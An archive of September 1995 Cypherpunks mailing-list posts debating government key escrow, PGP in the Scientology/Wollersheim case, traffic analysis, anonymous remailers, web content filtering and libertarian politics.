I got the ad (and a subsequent review copy, upon request) after we published the first issue of the Journal of Law & Technology on the web. It appears that they got my name, and address, from the web (both are displayed in the "Contacting the Journal" page).

I haven't had much time to read the book, but my recollection is that it is somewhat misguided in its analysis of privacy online. Its historical perspective is fairly thorough, however.

--Rick Klau

---------
Richard P. Klau (3L) // klaurich at uofrlaw.urich.edu
Editor in Chief, Richmond Journal of Law & Technology
http://www.urich.edu/~jolt/

From cme at acm.org Fri Sep 8 15:19:00 1995
From: cme at acm.org (cme at acm.org)
Date: Fri, 8 Sep 95 15:19:00 PDT
Subject: Key Escrow Papers
In-Reply-To: <199509082016.NAA22536@comsec.com>
Message-ID: <9509082216.AA12075@tis.com>

>From: John Young
>Date: Thu, 7 Sep 1995 20:55:49 -0400
> Note 1: It was Michael Nelson of the White House who said
> that the reason to maintain the 64-bit limit for export was
> because the key escrow methodology had not yet been proven
> reliable and that the security agencies insisted on the
> relatively weak system in case key escrow failed.

Clint Brooks of NSA repeated this assertion, at least once. He said it during the August 17, 1995 meeting as well.

I find this interesting, not least as a violation of security. This amounts to an open declaration that NSA can break through 64-bit keys.

Could it be that NSA was miffed at being upstaged in the announcement of breaking through a 40-bit key and wanted to up the ante? .... :-)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison   cme at acm.org   http://www.clark.net/pub/cme/home.html   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
| ``Officer, officer, arrest that man!  He's whistling a dirty song.''      |
+----------------------------------------------------------- Jean Ellison -+

From cme at TIS.COM Fri Sep 8 15:25:49 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 8 Sep 95 15:25:49 PDT
Subject: Day 2, nist GAK meeting
In-Reply-To: <199509082025.NAA22581@comsec.com>
Message-ID: <9509082219.AA12139@tis.com>

>Date: Fri, 8 Sep 1995 06:36:00 -0700
>From: pfarrell at netcom.com (Pat Farrell)

>Penny Brummitt of NSA was to talk about Clipper's key escrow agents,
>but called in sick. I didn't catch the name of the replacement.

It was Jan Manning.
He's NSA's person designing the Law Enforcement decrypt box and possibly other related equipment for the Clipper program.

From stewarts at ix.netcom.com Fri Sep 8 15:39:46 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 8 Sep 95 15:39:46 PDT
Subject: Slightly faster checking for encrypted messages to me
Message-ID: <199509082239.PAA20047@ix8.ix.netcom.com>

At 10:31 AM 9/5/95 -0800, Doug Barnes wrote to Hal and us:
>If two entities want to communicate via a message pool,
>without worrying about traffic analysis, but don't want
>the overhead of trying to decrypt every headerless
>message to the pool, then they can do the following:
>
>1) In a "headered" message, one of the entities (A) sends
>   a collection of large random numbers to be used as return
>   markers, encrypted with the public key of the desired
>   correspondent (B).
>
>2) B can then respond to A with an essentially headerless
>   message prefixed with one of the numbers sent by A.
>   This initial message should contain a list of similar
>   numbers for B, that A can use to send messages to B.

There's a way to get this without sending as much data - using a relative of S/Key (probably not affected by S/Key patent.)

A sends B two random numbers, thing1 and thing2. B's headers include a prefix of n, hash( thing2, hash^n(thing1) ) where hash^n is n rounds of hash, e.g. MD4 or MD5. Thing2 can possibly be a well-known string instead.

Assuming there's no special relationship between thing2 and the hash function, it should be hard to derive hash( thing2, hash^n(thing1) ) from hash( thing2, hash^(n-1)(thing1) ) presumably as hard as inverting the hash. (Brute-force is an option if thing1 is not chosen well, involving a few hundred hashes on a few million popular wimpy passwords, but S/Key suffers from the same weakness.)

Including n in the header is a mild message-correlation risk, though messages don't have to be sent with consecutive n's (at a cost of more runs of hash per message.)
This lets you recover easily from lost messages. There's also the mild risk that the thing1 and thing2 keys need to be stored, though Doug's method also suffers from that.

It is also possible to use S/Key itself - the original message from B to A contains Xn = hash^n(key) and maybe n. The next message contains Xn-1 = hash^(n-1)(key), which A checks by hashing it and looking in his table of messageids for Xn. A can recover from small numbers of lost messages by hashing a few times. (Since you're not using it for authentication, is it covered by the S/Key patent?)

This method has the weakness that Traffic Analysts can also correlate messages by hashing the fields and comparing with previous. One workaround is for B to also send A the keys for some simple encryption method E such as "Ek = m xor k" and use Xn = Ek(hash^n(key)). This requires A to perform an xor and a hash for each correspondent (B, C, D, ...), but is probably secure enough. Alternatively, since the numbers are fairly short, you can use "Ek = m^k mod p", but that's starting to look like work :-).

#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com Fri Sep 8 15:40:14 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 8 Sep 95 15:40:14 PDT
Subject: University logging mail to anon.penet
Message-ID: <199509082239.PAA20081@ix8.ix.netcom.com>

At 07:30 PM 9/6/95 -0700, you wrote:
>Our local University apparently has been logging ALL mail to anon.penet,
>including faculty, students, and off-campus users.

Any time you're using non-encrypted remailers, you've got no protection against people doing that; even with encrypted messages they can still tell who's sending mail to anon.penet.fi, but can't tell who the messages are forwarded to.
There may be ECPA issues involved, especially if CalPolySLO is a government-run university; the sysadmins certainly need to learn some ethics...

If your ombudsperson can be reached by email, a note through anon.penet.fi explaining the usefulness of anonymous remailers for sensitive communications might be educational. After all, it's a technique they might want to use for handling sexual harassment cases or other problems requiring two-way communications.

#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From kqb at whscad1.att.com Fri Sep 8 15:47:10 1995
From: kqb at whscad1.att.com (Kevin Q Brown +1 201 386 7344)
Date: Fri, 8 Sep 95 15:47:10 PDT
Subject: GAK Hacks and Position Surveillance
Message-ID: <9509082244.AA12403@ig1.att.att.com>

> GAK Hacks!
> We did it for SSL, let's do it for GAK.
> Demonstrate that superencryption (encrypting within a GAK wrapper) defeats
> GAK. And other kinds of hacks, including releasing "damaged" (inoperative)
> versions of the proposed code (when it becomes available).

Tim,

That's a start. Superencryption can protect the _content_ of the conversation, but it will not prevent _traffic analysis_. That is an important issue because, as I explain below, in our increasingly wired world, effective traffic analysis may become a _position_ escrow system, except that there won't even be any escrow. A GAK Hack that combines superencryption with a method to defeat traffic analysis would raise a lot more eyebrows than superencryption alone.
Unfortunately, since we don't yet know what kind of LEAFs will be in the next-generation GAK proposal, I can only refer to some comments made awhile ago about Clipper-based traffic analysis:

Date: Mon, 14 Mar 94 10:36:05 EST
From: smb at research.att.com
> The LEAF can be decrypted with just the family key; from what's been
> disclosed so far, local law enforcement agents will be able to do that
> without contacting the escrow sites. The LEAF contains the unit id of
> the chip, independent of what phone number it's being used from, ...

Imagine someone using a GAK/LEAF communication device while travelling throughout the day. Especially if the communications are wireless, no court order will be needed to track position during his/her journeys because a packet sniffer armed with the family key could detect any of his/her communications automatically. You may wonder "what packet sniffer could track communications like that"? Maybe I'm wrong, but isn't that what the recent Digital Telephony legislation was for?

Now let's return to a recent message from tcmay at got.net:
> The pernicious nature of the "escrow" idea, ... is that it says that
> surveillance is not so bad after all, because the results of the escrow
> will not be looked at except when "justified." ...

Or perhaps, once a GAK system with some kind of LEAFs is in place, no justification at all will be needed to accomplish efficient and fully automated massive position surveillance. Maybe key escrow is just a red herring to distract us from position surveillance? Of course, we can assume that these LEAFs will not be as vulnerable to forging as Matt Blaze demonstrated for Clipper (Tessera?).

First we had: GAK = Government Access to Keys.
Perhaps now we have: GULPS = Government Unlimited License for Position Surveillance?

Frankly, I wouldn't be surprised if I have overstated the threat and more technically knowledgeable minds on this list will expose the flaws in my reasoning. Please do.

Kevin Q. Brown
kevin.q.brown at att.com
kqb at whscad1.wh.att.com

From dl at hplyot.obspm.fr Fri Sep 8 16:08:22 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Fri, 8 Sep 95 16:08:22 PDT
Subject: Cyphernomicon
In-Reply-To:
Message-ID: <9509082307.AA05637@hplyot.obspm.fr>

-----BEGIN PGP SIGNED MESSAGE-----

Dar Scott writes:
[...]
> Here is a summary of what I learned:
[...]
> FTP sites:
> ftp.netcom.com/pub/tc/tcmay/CP-FAQ
> The original. "crowded" (I couldn't open an FTP port.)

Got it from there, anyone feel free to fetch : ftp://hplyot.obspm.fr/net/CP-FAQ.gz

> ftp.goblin.punk.net/pub/docs/cypherpunk.faq.gz
> ftp.goblin.punk.net/pub/docs/cypherfq.zip
> 28.8 bps modem, newline=CR, but .zip will change to newline=CRLF
> About 432Kbytes.
> (On PPP at 14.4 it took me 6+ minutes to get it.)
> "until someone posts it on a site with higher bandwidth"

hplyot's link to the world is 2mbit/s, feel free to fetch it from here...

> HTML sites:
> http://www.oberlin.edu/~brchkind/cyphernomicon/
> http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ
> text. very responsive and fast (6 minutes for my 14.4 connection).
> http:/www.isse.gmu.edu/~pfarrell/crypto/CP-FAQ
> text
> http://www.msen.com/~lwp/Cyphernomicon.gz
> About 432Kbytes. Need g[un]zip utility.

(here, typing get CP-FAQ instead of get CP-FAQ.gz will gunzip it on the fly, but you shall IMO get gzip for your system anyway :-)

hope this helps

regards

dl
- --
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMFDMrXk52/beodHxAQFqnwQAjOY/nDOoUweYo5Xc7XjZPpRDFWqKuErp
nWgnmdrSeJPq8oyOeBtMZActfLoJFFtkcEWlooLasG+RCLhqaTA32nc75/Nv2A0s
ODQYj6Z2YhrzocDCKDtWegh5mNUEeWlIGnzRNSq/1lJV4cfLaHDzLoq+7ypt/epi
TDmOZMVXmLU=
=XKUy
-----END PGP SIGNATURE-----

From liberty at gate.net Fri Sep 8 16:24:58 1995
From: liberty at gate.net (Jim Ray)
Date: Fri, 8 Sep 95 16:24:58 PDT
Subject: [NOISE]Re: ECPA (Was: University logging mail to anon.penet.fi)
Message-ID: <199509082321.TAA28363@tequesta.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

> Whatever do the workings of a hypothetical "libertarian"
>society have to do with the "Libertarian Party"? Certainly, it would
>be nice if the latter were working towards the former, but the two are
>not the same.

So? (They are as close as we are going to get.)

> I know of quite a few `l'ibertarians who strongly object to
>the `L'ibertarian Party pledge.

They were in the minority in my party, even *before* the OK City mass-murder proved why we have such a pledge (to distance ourselves from those who would initiate violence). This reply, to a reply to the ENTIRE list, would probably have been better sent privately. The reason that I first sent to the whole list was as much to encourage other posters to proofread their posts as for any libertarian political purpose.

PS Interesting letter to the editor RE: Jerry Garcia in today's WSJ.

JMR

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMFDPzG1lp8bpvW01AQGXRwP9Hxzigw1OCcL1L1u3jSlUvAMtzVPhDkwd
99czrw9jqSXfMhdouGNP3IwjZLXhF0AlmV+chMmMC7Z0xy/Qjznhgut8jIS7IpQN
KsXLVwWLCWk0U8nN27WuHVQoImfIG2ONLUUaM36pg1GGFTdQLiJauif2ZYDL6JSJ
+E1v7dmnLMc=
=xrhl
-----END PGP SIGNATURE-----

Regards,
Jim Ray

"As sensitive and broad-minded humans, we must never allow ourselves to be in any way judgmental of the religious practices of other people, even when these people clearly are raving space loons." -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35                                  James M. Ray
------------------------------------------------------------------------
Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________

From alano at teleport.com Fri Sep 8 16:34:28 1995
From: alano at teleport.com (Alan Olsen)
Date: Fri, 8 Sep 95 16:34:28 PDT
Subject: ON OFF-TOPIC [NOISE]
Message-ID: <199509082334.QAA16208@desiree.teleport.com>

>Is there something authoritarians want, that we don't mind them having,
>for which crypto would be an enabling technology? Some of them _might_
>be interested in having better encryption for TV channels so that kids
>can't watch a NotForKids channel (though many of them might rather ban
>it outright) or so they can easily control whether their kids get to
>watch MTV even though the V-Chip doesn't have a NoisyKidsMusic bit.
>Perhaps they'd enjoy having reputation systems available, so they can
>easily filter out politically incorrect material, or do a thumbs-down
>on things they disapprove of, or let the Baptists and Catholics and
>Anti-Baptists all have their own convenient ratings.

MTV has a pretty funny parody of the V-chip concept that they have run on occasion.
They are advertising that kids should get the MTV-chip which prevents parents from watching MTV while the kids are at school. Their slogan is "keep mind control at home where it belongs". (I find it interesting that they have an anti-censorship stance, yet censor many of their videos. Kind of hypocritical...)

| Minister of Forced Caffinization in the DNRC      | alano at teleport.com |
|"The moral PGP Diffie taught Zimmerman unites      | Disclaimer:         |
|all mankind free in one-key-stenography-privacy!"  | Ignore the man      |
| -- PGP 2.6.2 key available on request --          | behind the keyboard.|
| http://www.teleport.com/~alano                    |                     |

From adwestro at ouray.cudenver.edu Fri Sep 8 17:45:44 1995
From: adwestro at ouray.cudenver.edu (Alan Westrope)
Date: Fri, 8 Sep 95 17:45:44 PDT
Subject: Scientology tries to break PGP - and fails?
In-Reply-To: <9509081654.AA03407@ch1d157nwk>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Tonight's local news included an interesting blurb about this case. The judge refused to order Wollersheim to disclose his passphrase, since the encrypted material comprised names of Co$ critics who could then be targeted by the Church. And the secret (and copyright!) $criptures were read in court and excerpts broadcast on the news, "closed-captioned for the hearing-impaired." All the entertaining stuff some of us have been reading on the net was there: aliens transported to earth, volcanoes h-bombed, thetans...I laughed my ass off. A bigtime win for PGP and encryption generally, and a major PR debacle for the $cienos.

Kute Korrespondences Koda: Tomorrow, Sept. 9, there will be protests worldwide at Co$ centers. I was cleaning out some paperwork and disk file archives recently, and noticed that the ViaCrypt and Austin Code Works subpoenas were dated Sept. 9, 1993. Grady Ward of ACW has, of course, been a major Co$ antagonist, making good use of PGP and the Cypherpunks remailers. The old message I found detailing these subpoenas was from this list's sometime visionary, L. Detweiler.

Alan Westrope          __________/|-,
                      (_)       \|-'
2.6.2 public key: finger / servers
PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFDh51RRFMq4NZY5AQEO/gP/VgOEP8LpcrrIno2yj3oqD7zHc3a0d5If
GC/ze1b6frpWPKo2mIb7IiZQzQ8rkZmky07PR9MV6jPO4S8UCpwix/ylgV1kGWmd
WWWe4t8xVfHc2wJGS7qjRvkt8PDvgPkcHWktxOHkASl9cemscwYJbGyXq1BkCJCT
Mkgv7cSClDM=
=Nuz5
-----END PGP SIGNATURE-----

From tcmay at got.net Fri Sep 8 17:53:26 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 8 Sep 95 17:53:26 PDT
Subject: Libertarian Party and Crypto Anarchy
Message-ID:

[I've changed the name of this thread. Somehow the title "Re: [NOISE]Re: ECPA (Was: University logging mail to anon.penet.fi)" did not quite cut it. I really wish folks would take the effort to change thread names when appropriate.]

At 11:24 PM 9/8/95, Jim Ray wrote:
>They were in the minority in my party, even *before* the OK City
>mass-murder proved why we have such a pledge (to distance ourselves
>from those who would initiate violence).

As a point of reference, I usually vote Libertarian, even though it's pointless. And I'm even registered "Libertarian Party," which matters even less. (I've also changed my registration to Democratic or Republican when I wanted to influence in some tiny way their primaries...as when I switched to Democrat so as to vote for Jerry Brown, mainly because of his flat tax proposal.)

But I've never signed the LP "pledge" as I dislike such blanket pledges. And I dislike the notion of pledges per se. So, I'm registered to the Libertarian Party, and usually vote Libertarian. But I am not allowed to be a dues-paying member and get their worthless newsletters, which suits me fine.

(Anybody prepared to bomb a government building is not going to balk at signing such a pledge, so it does little good. Personally, I think the "pledge" is profoundly anti-libertarian, and smacks of McCarthyism.)

Your mileage may vary.
And I place a lot more faith in crypto activism having an effect than in the LP having an effect. Crypto and crypto anarchist ideas are already creeping into the LP belief system, as reflected in articles in "Reason" and "Liberty." And David Friedman (author of "The Machinery of Freedom," and son of Milton) gave a talk recently in L.A. entitled "Crypto Anarchy and the State."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From cman at communities.com Fri Sep 8 18:00:00 1995
From: cman at communities.com (Douglas Barnes)
Date: Fri, 8 Sep 95 18:00:00 PDT
Subject: GAK
Message-ID:

>
>If too much attractive stuff is available by loss of any one public key,
>that key gets attacked. To compensate for this, the TIS DRC generates new
>public keys periodically to give out to new (or old) customers.
>
>However, a government warrant which demands the DRC's private key collection
>would gain quite a harvest.

The economics of the situation seem to dictate that whether you have one key or N keys, it's going to be cheaper to subvert the escrow agent (you guys or whoever) than it is to brute-force even one key. Therefore I'm not clear on how using multiple keys buys you much against the most probable threat -- opponents getting physical access to keys or the subversion of personnel who have legitimate access.

Of course, it's still a good policy, reducing the payoff to those too timid to try the direct approach. But I think this threat is significantly less likely than a disgruntled employee selling the DRC private keys on a real instantiation of the Blacknet model, without even being solicited.
You may feel very comfortable with the personnel and procedures you have in place now, but auditing and vetting systems are notorious for scaling very, very poorly. You may feel you can vouch for the trustworthiness of everyone at TIS now, but this sort of familiarity also scales very poorly. And clearly, were this to become commercially significant, it would need to scale quite a bit.

Douglas Barnes
Electric Communities

From nobody at REPLAY.COM Fri Sep 8 19:10:34 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 8 Sep 95 19:10:34 PDT
Subject: Web Exon A-rate
Message-ID: <199509090210.EAA17069@utopia.hacktic.nl>

WS Journal, Sept. 8, 1995.

Cleaning the Web: Companies to Seek Pornography Blocker

Array of Technology Firms Will Join in Effort to Let Parents Screen the Internet

By Jared Sandberg

Some of the high-tech industry's biggest companies are banding together in a broad-based consortium to develop a way for Internet users to screen out pornography and other offensive material.

The group, whose creation is expected to be announced on Monday, is believed to include International Business Machines Corp. and Microsoft Corp., telecommunications giants AT&T Corp. and MCI Communications Corp., on-line firms America Online Inc. and Netscape Communications Corp. Entertainment heavyweights Time Warner Inc. and Viacom Inc. also have been approached.

People familiar with the plans said the consortium hopes to develop industrywide standards for obscenity-blocking technology as a way to forestall much-criticized proposals from federal regulators. It amounts to an effort to develop a voluntary Internet equivalent of the "v-chip" that has been proposed as a way for parents to block sex-and-violence-laden TV programs.

The venture will pursue a system that would allow Internet users -- such as teachers or parents -- to prevent pornography from being accessed by children.
The group will be led by the World Wide Web Consortium at the Massachusetts Institute of Technology, executives said. The consortium, funded by roughly 80 companies, aids in the development of the Web, the multimedia portion of the Internet, by producing technical specifications and software.

Various companies have worked on ways to shield children from indecent material. The new consortium will pursue an overarching method available to all Internet players -- software firms, access providers and on-line services. MIT will coordinate this "umbrella organization to prevent industry infighting," said one executive. "It's aimed at creating a standard that all the software companies can develop for."

A separate project by Microsoft and Netscape, together with two smaller firms, SurfWatch Software Inc. and Progressive Networks Inc., will now be folded into the new consortium, another executive said.

The effort follows such proposals as the antipornography provision of Sen. James Exon (D., Neb.), which won overwhelming support in the Senate and would slap prison terms on people who make "indecent" remarks on-line. Most of the proposals have been met with scorn from the Internet industry. Executives have said that legislators could cripple the commercial growth of the Internet before it emerges from infancy.

------

From dsc at swcp.com Fri Sep 8 20:09:14 1995
From: dsc at swcp.com (Dar Scott)
Date: Fri, 8 Sep 95 20:09:14 PDT
Subject: Libertarian Party and Crypto Anarchy
Message-ID:

Timothy May wrote,
>And David Friedman (author
>of "The Machinery of Freedom," and son of Milton) gave a talk recently in
>L.A. entitled "Crypto Anarchy and the State."

Is text available for that talk?

Dar

===========================================================
Dar Scott                    Home phone: +1 505 299 9497
Dar Scott Consulting         Voice:      +1 505 299 5790
8637 Horacio Place NE        Email:      darscott at aol.com
Albuquerque, NM 87111                    dsc at swcp.com
                             Fax:        +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================

From dl at hplyot.obspm.fr Fri Sep 8 20:32:43 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Fri, 8 Sep 95 20:32:43 PDT
Subject: [NOISE/Fun] some 'special' primes
Message-ID: <9509090332.AA06578@hplyot.obspm.fr>

-----BEGIN PGP SIGNED MESSAGE-----

I hope this is not already extremely well known,... but, seeing on the list a sig with someone claiming to have the 'last' prime, I played a bit this nite and searched for the *first* alphabetically sorted prime (once written as spelled, sorted like with unix's sort) depending on the language :

Easiest:
English : 11 : eleven

A bit more fun :
German : 811 (dunno how to write it, but it starts with an "a")

Exotic one :
slovenian: 10019 desettisocdevetnajst

And..... the tricky one, which I hope is the good one (challenge: find one 'before') :
French (and possibly spanish/italian,...too) : 105 105 000 105 167
(it spells cent cinq mille cent cinq milliards cent cinq mille cent soixante sept)
[note that 'billion' is not used for numbers in common language, and that soixante-dix has a - and not a space :-) ]

More languages ? better results anyone :-) ?

Regards

dl

ps: I used gnu MP lib for my hack when I hit the 2^32 limit, but it's rather slow... (ok, it's prolly due to my lazy prime algo too, but...) is there some well-known fast mp lib to play around with primes ? (should I look and extract PGP's ?)

- --
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
105 105 000 105 167

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMFEKvXk52/beodHxAQH+cgQAwUzDczvIzXaBzYx/Q5oerXFZ/ABDjp8b
Sz20qgBmB3BP9jE8GbibqIF1FOExS2r3irg4PQHhUwuX7wWT/deo8KzWMrb3C2fi
X3kMbtWM9hQNHJ1mRpAE41M1NuHgk8xM43WbkZcLyYOPXXWSAAs0qc+bdNamtUDT
iujkF9fQxck=
=mkaz
-----END PGP SIGNATURE-----

From mike at uac.net Fri Sep 8 20:58:55 1995
From: mike at uac.net (Michael)
Date: Fri, 8 Sep 95 20:58:55 PDT
Subject: [NOISE/Fun] some 'special' primes
In-Reply-To: <9509090332.AA06578@hplyot.obspm.fr>
Message-ID: <199509090358.XAA18311@mail1.uac.net>

> A bit more fun : German : 811 (dunno how to write it, but it starts
> with an "a")

acht hundert uenf (I think)

--Michael

From dsc at swcp.com Fri Sep 8 21:07:44 1995
From: dsc at swcp.com (Dar Scott)
Date: Fri, 8 Sep 95 21:07:44 PDT
Subject: Web Exon A-rate
Message-ID:

Somebody passed this along:
>WS Journal, Sept. 8, 1995.
>
>Cleaning the Web: Companies to Seek Pornography Blocker
>
>Array of Technology Firms Will Join in Effort to Let
>Parents Screen the Internet
>
>By Jared Sandberg
[snip]

This is a good idea. And maybe cryptography can get involved--see below.

As a parent it is my responsibility to control what comes into the house and to determine what limited view of the net my kids see. The screening software to do this could be in my home or part of a service of my service provider. A few companies have some simple products for doing this. Most are discouraged by threats from congress to reduce the market need. Most products use a simple red list to block access according to literature sent me. Some look for key words.

Normally, I would say that it is very premature for standards work. It would be good to see more ideas tried. The Exon threats probably do not allow this, so I see this news as a good thing.

One place to start is the web.
Depending on the kid's age and other factors I would want to have different limitations on what the kid sees. Older kids might just get warnings. I would like--for the little ones--to limit the view to some combination of sites listed on green lists. The view for slightly older kids might use red lists to exclude sites instead. (I really would want to create some logical combination of lists for each kid.)

Organizations can compete for the list market. I might use these in whatever combination I like and also add my own. It is important to note that the kinds of things I would like to screen out or in might be different from what the next person would like to screen out or in. (I put little faith in content screening.)

The problem might be in getting huge lists every week. And pages that seemed fine once could have changed. Current red list subscriptions are expensive--it is easier to keep kids off the computer.

>>>>>> the part that mentions cryptography >>>>>

As an alternative to green lists consumer organizations and do-gooder organizations might certify pages. These might be virtual green lists. Each web page would have the cert built in--perhaps in comments to allow most viewers to work. Instead of checking a list in this case, the screening software would ask the page to verify itself.

If the cert was PGP based, then every home doing this would have to have PGP. The screening product could use PGP. Perhaps PGP would be slow. There might be some way to check signatures that is faster and does not have patent limitations. It would be nice if it was possible for the browser to see the first screenful without waiting for the screener to see the entire page.

Only those that especially want to make their sites available to kids of picky parents would get the pages certified. Maybe just sending in e$3 would do it. Or e$50 to get to the head of the list.
In whatever standards that come about, it is important that only those involved in the screening process pay the price ($, delays). Everybody else should be able to carry on.

I do worry that some quick standards would be put into place and that innovation in this area would then become arrested.

Dar
===========================================================
Dar Scott                   Home phone: +1 505 299 9497
Dar Scott Consulting        Voice:      +1 505 299 5790
8637 Horacio Place NE       Email:      darscott at aol.com
Albuquerque, NM 87111                   dsc at swcp.com
                            Fax:        +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================

From sameer at c2.org Fri Sep 8 21:55:45 1995
From: sameer at c2.org (sameer)
Date: Fri, 8 Sep 95 21:55:45 PDT
Subject: GAK Hacks
In-Reply-To: <199509081611.JAA05733@jobe.shell.portal.com>
Message-ID: <199509090450.VAA19757@infinity.c2.org>

>
> One would be to create a patcher which would let you change the set of
> certificate authorities accepted by the browser. Currently the browser
> accepts at least one (an internal Netscape test CA) which is not needed
> by end users. Maybe its public key could be statically overwritten by
> the patch program with the public key of the replacement CA. This sounds
> simple and safe. The patch program can confirm that the data being
> changed matches the test CA.

Where is the public key for the test CA available? Seems pretty trivial to take those bits and just do a bit compare against your netscape binary to find out where the key is stored within the binary..

--
sameer                                      Voice:   510-601-9777
Network Administrator                       FAX:     510-601-9734
Community ConneXion: The NEXUS-Berkeley     Dialin:  510-658-6376
http://www.c2.org (or login as "guest")              sameer at c2.org

From cme at clark.net Fri Sep 8 23:07:24 1995
From: cme at clark.net (Carl Ellison)
Date: Fri, 8 Sep 95 23:07:24 PDT
Subject: Open letter to Geoff Greiveldinger, DoJ
Message-ID: <199509090607.CAA02659@clark.net>

I just posted the following.
I'll have to wait to see if the moderator accepts it.

Date: Sat, 9 Sep 1995 01:11:06 -0400
From: Carl Ellison
To: risks at csl.sri.com
Subject: Open letter to Geoff Greiveldinger, DoJ

NIST (the National Institute of Standards and Technology) held a two day public meeting on September 6 and 7, 1995 to discuss Software Key Escrow as a possible means of achieving export of cryptography. In the morning of 9/7, Geoff Greiveldinger of the Department of Justice gave a description of the kinds of crimes which DoJ wants to use wiretapping to solve. He closed this litany of lawbreaking with the assertion that software manufacturers don't want to provide products which allow such lawbreakers to keep their criminal evidence hidden from law enforcement.

I'm sorry to disillusion you, Geoff, but I *do* want to make such systems.

Would you have Ryder stop renting trucks because some terrorist decided to fill one with explosives and kill many innocent children? Would you have Americans stop making automobiles because bank robbers have been known to use cars for getaways? Would you have all new buildings constructed with FBI microphones in every wall because some criminals meet in private rooms in order to plan crimes?

When an American company sweeps its conference room for bugs, finds some and destroys them, it doesn't matter whether those bugs were planted by industrial spies or the FBI. The company has a right to eliminate them. When that company ties two such conference rooms together by video-conference equipment and encrypts the line between them using strong link encryption, it is performing the same defensive operation in cyberspace. It is protecting itself from spies and it doesn't matter that the wiretaps it frustrates might be illegal ones by industrial spies or legal ones by the FBI. The right to attempt to achieve privacy is a long-standing one in this country and not one to allow to be lost.
When I design and build systems for privacy for my customers, I am providing products for law-abiding, honest people. I am aware of criminals, of course. Criminals are the threats against whom I protect my customers. These criminals are usually not in the government but that doesn't mean that I believe I should offer my honest customers up for a strip-search in cyberspace.

The law enforcement agencies of this free country have no right to expect blanket access to the ciphertext of citizens. It will take legislation to get that right and I will do everything in my power to keep such legislation from passing. Barring such legislation, I will make sure that honest American citizens have cryptography with which to attempt to maintain their privacy, even from the government.

We have the right to attempt to keep a secret from government agencies and continuous demonstration of that right is an important part of this free country.

On the other hand, I am sympathetic to law enforcement officers. I have several friends in that business. I have asked my friends and acquaintances who do surveillance (2 IRS agents investigating organized crime for tax evasion; 2 undercover cops in Boston's highest drug neighborhood; 1 DEA agent in the midwest) if they ever encounter encrypted communications or files. They don't. Neither does anyone in their offices. Of course, even if they did it would remain so important to preserve our right to attempt to keep secrets from the government that their frustration would just have to be accepted. The fact that this isn't a real problem makes my decision that much easier. I am left with no moral qualms at all.

In summary, criminals are so few that I will not design for them. I will not treat my vast majority of honest users as if they were criminals just because some criminal might someday use my product and frustrate you.
ObRisk: We run the risk of losing our fundamental right to attempt to keep a secret from the government -- a practice we need to preserve in order to protect ourselves from criminals in cyberspace. There are powerful forces in the US government attempting to cajole us into giving up that right.

[see http://www.clark.net/pub/cme/html/nist-ske.html for more on this subject]

From greg at ideath.goldenbear.com Sat Sep 9 00:44:52 1995
From: greg at ideath.goldenbear.com (Greg Broiles)
Date: Sat, 9 Sep 95 00:44:52 PDT
Subject: Scientology/Wollersheim as test case for key disclosure
Message-ID: <199509090742.AA15129@ideath.goldenbear.com>

-----BEGIN PGP SIGNED MESSAGE-----

Andrew Loewenstern writes:
>
> Modemac writes:
> > Mr. Wollersheim has stated that he will go to jail before he reveals
> > his encryption key.
> [...snip...]
> > Call this one: BIG WIN FOR PGP!
>
> Could this be it? The test case for forced key disclosure? The
> Scientologists seem very determined and already have a grudge against
> Wollersheim (according to a web page I saw Co$ owes him several million from
> a settlement). Has Co$ filed against Wollersheim over this yet?
>
> If this does go to court and forcing Wollersheim to reveal the key becomes a
> central issue, is this the test case "we" want? Is this a "BIG WIN FOR PGP!"
> or not?

Well, since it's (apparently) a civil case against Wollersheim, the potential Fifth Amendment self-incrimination issues may be murkier, so this may not be a good test case for the criminal context. In federal civil trials, material reasonably likely to lead to the discovery of admissible evidence is discoverable unless there's an applicable privilege - this means that in a civil case, a defendant may be forced to hand over material likely to expose them to liability. (The Fifth Amendment privilege against criminal self-incrimination still applies).
